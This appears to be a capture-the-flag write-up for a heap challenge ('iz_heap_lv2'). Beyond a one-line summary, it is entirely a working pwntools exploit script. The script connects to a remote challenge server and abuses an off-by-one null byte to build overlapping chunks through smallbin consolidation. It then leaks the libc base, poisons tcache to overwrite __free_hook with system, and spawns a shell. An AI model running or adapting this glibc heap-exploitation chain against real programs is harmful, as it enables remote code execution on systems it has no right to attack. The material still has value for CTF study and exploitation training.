Tags: null-byte-poisoning smallbin 

Rating: 0

smallbin consolidation to overlaping chunks -> tcache poison to free hook.
```
from pwn import *

#r = process("./iz_heap_lv2")
r = remote("165.22.110.249", 4444)
LIBC = ELF("./libc.so.6")
name = 0X602100
def alloc(sz, data):
r.sendlineafter("Choice:","1")
r.sendlineafter("Enter size:",str(sz))
r.sendlineafter("Enter data:",data)

def edit(idx, data):
r.sendlineafter("Choice:","2")
r.sendlineafter("Enter index: ",str(idx))
r.sendafter("Enter data:",data)

def delete(idx):
r.sendlineafter("Choice:","3")
r.sendlineafter("Enter index: ",str(idx))

def print_chunk(idx):
r.sendlineafter("Choice:","4")
r.sendlineafter("Enter index: ",str(idx))
r.recvuntil("Data: ")
return r.recvline().rstrip()

alloc(0x40,"/bin/sh\x00") # 0
alloc(0xf0, "BBBBBBBB") # 1
alloc(0x40,"CCCCCCCC") # 2
alloc(0x40,"DDDDDDDD") # 3
alloc(0x58,"EEEEEEEE") # 4
alloc(0xf0,"FFFFFFFF") # 5

log.info("OFF BY ONE NOW!")
edit(4,"X"*0x50+p64(0x200))

prg = log.progress("filling tcache")

for i in range(7):
alloc(0xf0,"")

for i in range(7):
delete(i+6)

prg.success("filled")

log.warning("consolidating...")
delete(1)

delete(5)

prg = log.progress("draining tcache")

for i in range(7):
alloc(0xf0,"")

prg.success("drained")

alloc(0x100,"ZZZZ")
alloc(0x100,"YYYY")
alloc(0xd0,"WWWW")

log.success("EZ OVERLAPS")

write_chnk = 12
edit(11,"AAAAAAAA") # padding so we could get a leak
libc_leak = u64(print_chunk(11)[8:].ljust(8,"\x00")) - (0x3ebca0+0x2f0)
log.success("LIBC BASE @ "+hex(libc_leak))

free_hook = LIBC.symbols["__free_hook"] + libc_leak
system = LIBC.symbols["system"] + libc_leak

delete(4) # chunk with Xs

contents = ""
contents += "A" * 0x88 # PADDING
contents += p64(0x61) # SIZE
contents += p64(free_hook) # POSION FWD ADDR
pause()
edit(write_chnk, contents)

alloc(0x50, "")
alloc(0x50, p64(system))
delete(0)

r.interactive()
```